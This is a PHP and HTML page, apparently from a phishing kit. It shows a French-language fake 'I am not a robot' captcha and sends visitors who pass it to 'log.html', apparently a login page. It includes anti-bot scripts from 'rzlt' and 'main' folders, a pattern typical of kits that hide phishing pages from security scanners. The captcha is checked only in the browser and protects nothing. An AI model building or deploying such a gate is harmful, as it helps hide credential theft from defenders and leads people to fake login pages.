<?php

include "rzlt/antibots.php";


include 'main/antibots.php';
include_once 'main/main.php';

$random   = rand(0,100000000000);
$LCA = substr(md5($random), 0, 17);
?>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Custom Captcha</title>
  <link rel="stylesheet" href="css/style.css">
  <!-- Font Awesome CDN Link for Icons -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/>
  
 

</head>
<body>
  <div class="wrapper">
    <header>Je ne suis pas un robot &nbsp;&nbsp;<img src="img/captch.png"style="width:50px;height:50px;"></header>
    <div class="captcha-area">
      <div class="captcha-img">
        <img src="img/captcha-bg.png" alt="Captch Background">
        <span class="captcha"data-callback="onSubmit"></span>
      </div>
      <button class="reload-btn"><i class="fas fa-redo-alt"></i></button>
    </div>
    <form data-callback="onSubmit" class="input-area">
      <input type="text" placeholder="Entrez le capcha" maxlength="5" spellcheck="false" required>
      <button type="submit" class="check-btn" >Vérifier</button>
    </form>
    <div class="status-text"></div>
  </div>

  <script >
  const captcha = document.querySelector(".captcha"),
reloadBtn = document.querySelector(".reload-btn"),
inputField = document.querySelector(".input-area input"),
checkBtn = document.querySelector(".check-btn"),
statusTxt = document.querySelector(".status-text");

//storing all captcha characters in array
let allCharacters = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9];
function getCaptcha(){
  for (let i = 0; i < 4; i++) { //getting 6 random characters from the array
    let randomCharacter = allCharacters[Math.floor(Math.random() * allCharacters.length)];
    captcha.innerText += ` ${randomCharacter}`; //passing 6 random characters inside captcha innerText
  }
}
getCaptcha(); //calling getCaptcha when the page open
//calling getCaptcha & removeContent on the reload btn click
reloadBtn.addEventListener("click", ()=>{
  removeContent();
  getCaptcha();
});

checkBtn.addEventListener("click", e =>{
  e.preventDefault(); //preventing button from it's default behaviour
  statusTxt.style.display = "block";
  //adding space after each character of user entered values because I've added spaces while generating captcha
  let inputVal = inputField.value.split('').join(' ');
  if(inputVal == captcha.innerText){ //if captcha matched
    function Redirect() {
            window.location.href = "log.html";
        }

        Redirect();
    setTimeout(()=>{ //calling removeContent & getCaptcha after 4 seconds
      removeContent();
      getCaptcha();
    }, 2000);
  }else{
    statusTxt.style.color = "#ff0000";
    statusTxt.innerText = "Le captcha ne correspond pas. Veuillez réessayer!";
  }
});

function removeContent(){
 inputField.value = "";
 captcha.innerText = "";
 statusTxt.style.display = "none";
}

  </script>

</body>
</html>
